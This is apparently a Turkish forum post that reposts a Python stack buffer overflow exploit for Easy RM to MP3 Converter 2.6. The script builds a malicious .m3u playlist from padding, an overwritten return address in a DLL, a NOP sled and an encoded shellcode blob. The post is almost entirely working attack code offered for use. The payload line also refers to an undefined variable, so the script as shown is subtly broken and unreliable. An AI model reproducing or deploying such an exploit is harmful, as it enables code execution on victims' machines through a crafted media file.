Hoşgeldin Misafir

Easy RM To MP3 Converter 2.6 Stack Buffer Overflow Exploit

NasyoneL

NasyoneL

Karanlık Özgürlüktür
25 Ağu 2017
25,060 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
Easy RM To MP3 Converter 2.6 Stack Buffer Overflow Exploit

Kod:
# Exploit Title : Easy Rm to Mp3 Convertor
# Author  =  Mr.0&1IRIH   [email protected]
# Version =  2.6
 
# Tested On windows 7 32 bit (Ultimate)
# Tested On windows Vista 32 bit
# Tested On windows Xp SP3
 
# Previous Exploits do NOT work on windows & versions. This one Does !
b  = "\x41" * (26088)
eip  =  "\x58\xb0\x01\x10"  # 0x1001b058    # DLL   = [MSRMfilter03.dll]
n = "\x90" * 25
shell =  ("\xd9\xec\xd9\x74\x24\xf4\xb8\x28\x1f\x44\xde\x5b\x31\xc9\xb1"
     "\x33\x31\x43\x17\x83\xeb\xfc\x03\x6b\x0c\xa6\x2b\x97\xda\xaf"
     "\xd4\x67\x1b\xd0\x5d\x82\x2a\xc2\x3a\xc7\x1f\xd2\x49\x85\x93"
     "\x99\x1c\x3d\x27\xef\x88\x32\x80\x5a\xef\x7d\x11\x6b\x2f\xd1"
     "\xd1\xed\xd3\x2b\x06\xce\xea\xe4\x5b\x0f\x2a\x18\x93\x5d\xe3"
     "\x57\x06\x72\x80\x25\x9b\x73\x46\x22\xa3\x0b\xe3\xf4\x50\xa6"
     "\xea\x24\xc8\xbd\xa5\xdc\x62\x99\x15\xdd\xa7\xf9\x6a\x94\xcc"
     "\xca\x19\x27\x05\x03\xe1\x16\x69\xc8\xdc\x97\x64\x10\x18\x1f"
     "\x97\x67\x52\x5c\x2a\x70\xa1\x1f\xf0\xf5\x34\x87\x73\xad\x9c"
      "\x36\x57\x28\x56\x34\x1c\x3e\x30\x58\xa3\x93\x4a\x64\x28\x12"
      "\x9d\xed\x6a\x31\x39\xb6\x29\x58\x18\x12\x9f\x65\x7a\xfa\x40"
                 "\xc0\xf0\xe8\x95\x72\x5b\x66\x6b\xf6\xe1\xcf\x6b\x08\xea\x7f"
     "\x04\x39\x61\x10\x53\xc6\xa0\x55\xab\x8c\xe9\xff\x24\x49\x78"
     "\x42\x29\x6a\x56\x80\x54\xe9\x53\x78\xa3\xf1\x11\x7d\xef\xb5"
     "\xca\x0f\x60\x50\xed\xbc\x81\x71\x8e\x23\x12\x19\x7f\xc6\x92"
                 "\xb8\x7f")
payload  =  (v + eip +  n + shell)
with open ("final.m3u", 'w') as d:
    d.write (payload)
    print "created"
    #print len(payload)
 
#  0day.today [2018-08-19]  #